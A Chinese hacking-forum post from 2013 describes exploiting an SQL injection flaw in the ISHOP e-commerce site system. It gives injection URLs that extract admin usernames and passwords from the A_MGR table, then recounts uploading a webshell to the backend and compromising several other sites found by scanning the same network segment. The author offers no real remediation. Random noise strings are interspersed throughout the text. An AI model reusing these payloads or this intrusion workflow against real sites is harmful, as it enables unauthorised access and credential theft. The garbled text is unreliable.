中国网络渗透测试联盟

标题: ISHOP商场建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:40
标题: ISHOP商场建站系统注入漏洞
发现一个注入点
3 u' S  T) u: n3 O1 o$ f1 B% zhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
  K% R9 H( @  }) ?+ x- N8 U5 A5 ~! D1 ~. y" @
习惯性的加’having1=1--
+ M( p7 Y# ]& c$ X7 e8 O# t4 ?, ]
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
" \9 D) ]6 f  G/ Z! R8 y! D
& @1 h& Z" ?" u; |8 {0
3 x- O; L) W% K1 w5 X' p1 s3 r6 J( j3 d
爆出Diary_A.dl_Title(这时候很激动啊)
" m* h! R* O9 [& j9 {; Z! ]( X  _2 A4 r) D& ^9 a
那么继续
3 V+ e1 {4 x. D4 q  uhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—& ?; Y4 o: {9 L2 u- A) B
5 u' J* S2 c0 m- Y0 D* M1 \" y
继续,一直爆下去
- v( H& S3 r6 |8 M. Y
5 n; T6 @6 k6 }2 [爆到几个字段和表段 但是没找到需要的管理用户的字段
% c9 r! L) h& f  A6 c9 V8 a  n. z0 w9 \
蛋疼了 怎么办 然后去后台登陆页看源码
0 v: E: j1 c5 t  @0 F! F$ \) g$ O$ G7 a6 g
0$ R. i4 x: n! I, K3 o" N8 |  ]
; I) K$ ~. L  u# n! M$ ]& O9 G2 Y
Input name= “ADUID”
4 u5 }5 |/ I! P( W; S2 TInput name= “ADPWD”8 Y/ }: k  Q: t9 d1 g' p8 Q* |* O

6 R2 t) j# ^; |0 ^: V很幸运 找到了字段那就继续& j2 e# t* A8 r. u" c
找到之后开始爆用户  K( ?$ ^! Y0 S- l# T+ B: w" Z" H
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—$ q$ U+ d0 L6 d. x
爆密码
* f2 F/ ^- ~0 S2 I4 D2 y+ z& [3 A, ^" Uhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
" y, Q" i1 w# z% j8 o; }, ^  L测试了下 这个注入点只能爆到文章哪里的表 8 z0 H; c' |  n9 l7 w- }  O. S
* [' g$ d2 v8 ?
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了. k$ E; b. F, N- J+ W' |! J

% D, ]# f5 g( b9 n又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了4 d! c- d+ C' j- W
! a7 ^& Z& s/ }0 ~4 r
473
0 O7 ]/ A% ~# x* ?4 ~3 d2 r1 s4 O! n
% e; k! I: @- n进后台
' X  q7 t+ d$ R7 C+ L7 [5 S# Q# k4 k. z. o0 [& q0 Y: i
6 t( {- k. g$ w2 N1 P
发现几个上传点 有的地方不能上传 而且防止恶意代码' A8 V9 [1 j& y) s; D# H# R/ g: H
* B1 \7 W: a" N
没办法 各种百度各种找大牛 找到一只好像可以突破的马
: z" e5 k3 w# Z. O7 N0 f" o3 U; l% O. e+ {) Y( J$ ~
8 `. M; u; D3 K# a3 W
在系统管理那里直接上传 不过没有显示地址7 W5 J" o/ a+ q- [* I. X1 ?

& Z8 e% l: ?2 Y* b1 o+ t" h再上传一次 抓包 搞定OK' w4 l, u. x; \% c: E( C

$ ~  A( g8 n: x( t' M& G% d; m) I" r$ Q' P* g
5 T) C& {; q% J( m
4726 e; u6 B8 Q; a# D3 [: C

. m8 `1 f- Y  c- T  \2 E) t晚上不行了 去睡觉。。。
$ i  g- y+ q* \6 M7 a: Z第二天刚起床 闲的没事做继续日站吧   B. v" _+ z" a& H; u- C  O
5 c3 C+ @: C$ i6 \6 |8 b
找个站 就把这个站的旁c扫了下5 b: R1 u0 n+ m( C% l

% M# L; R# V& H+ [# i" Z发现c段也有一个购物站 ,然后还和这个站的模板差不多+ x3 C7 [: d( b- X& {% U4 r. I
' i1 a  K  N5 s4 i' @
就找到会员登录口测试  }: x: V7 S7 q$ t! ]) F

6 r0 V& O+ K7 `'and (select top 1 MGR_UID from A_MGR)>0—5 v( i. }' L' O8 D  d6 E( N
果断爆到了 这时候我很激动 通杀
4 i$ ~8 ~# y* b$ a5 g# s9 q. z. P4 ?& [9 d
再次翻c段$ P( W! ^: B% k( G+ ?, J
* o7 Q7 _& H8 C. J* s' q7 y
翻出几个站 都成功拿下+ J5 D3 X* A  U" \1 d

' S# d6 G/ j4 i3 Q/ V  n2 B7 E7 C9 H+ E
( m4 y- a3 ~. c* w% P. d1 \
修复方案:' |- G1 H. L7 O3 O1 N; ~7 _. K
他们比我专业
/ m3 w& y$ f7 D" I0 N; H+ n7 `2 Y6 K# x; H
" q' r2 Z! D6 K1 [. `
1 t1 b6 {+ A( n7 m





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2